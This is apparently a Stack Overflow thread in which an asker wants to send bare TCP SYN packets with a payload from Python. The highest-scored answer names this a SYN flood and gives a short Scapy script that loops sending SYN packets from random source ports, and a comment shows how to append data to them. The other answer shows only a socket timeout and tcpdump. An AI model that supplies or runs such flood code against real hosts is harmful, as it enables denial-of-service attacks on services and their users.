# socket.connect blocks forever. How to just send the SYN packet with a LENGHT without waiting for response?

Tags: python, python-3.x, sockets, tcp, scapy

I have this simple code:

```
import socket

ip = "myip"
port = myport

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip,port))
print("SYN packet sent.")
```

If I run it, it never reach the print so it never complete the connect, and that's because the IP I want to connect to has not that port open.

In fact I don't want to complete the connection, but just need to send the SYN request.

Also, I would need to send packets with a LENGHT. If I test with hping3 and sniff the syn packets sent, I see that there is a payload of 100 lenght. How can I "add" this payload to the packet?

How can I do that?

Comment: You are mistaken. It will not block forever. It will time out after about a minute. You could use a connect timeout, or non-blocking mode.

Answer (score 1):

From what I can gather, what you're after is a TCP SYN flood and is probably best achieved using the [Scapy Library](https://scapy.net/). This could be achieved with code similar to the below:

```py
from scapy.all import *

def flood(src_ip, dst_ip, dst_port, amount):
 ip = IP(src=src_ip, dst=dst_ip)
 for i in range(0, amount):
  src_port = random.randint(20, 65000)
  transport = TCP(sport=src_port, dport=dst_port, flags="S")
  send(ip/transport)

if __name__ == '__main__':
 flood('x.x.x.x', 'x.x.x.x', '443', '1000')
```

As mentioned above, its important to note that you CANNOT send data within a SYN packet.

Comment: Hi, thanks for help. By the way, using hping3 sending syn packets, and sniffing the packets sent, I see that there's a payload of 100 lenght. How can I "add" this payload in these scapy made packets even if the port is closed?

Comment: You can add data by appending bytes: `send(ip/transport/b"deliciousdata")`

Answer (score 0):

If you do not care to wait for a response you could, for example, use [`socket.settimeout`](https://docs.python.org/3/library/socket.html#socket.socket.settimeout).

Here is an example setting a 5 seconds timeout:

```py
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)
    s.connect((ip, port))
except socket.timeout:
    pass
```

An other solution, albeit more difficult, would be to send the packet manually using raw sockets.

You can verify that your packets are indeed being sent by using a tool such as tcpdump:

```
$ tcpdump 'tcp port 5005'
```

Comment: Raw sockets won't help. You would have to conduct the entire conversation with them, and the platforms are very likely to reject TCP packets for TCP connections they don't know about.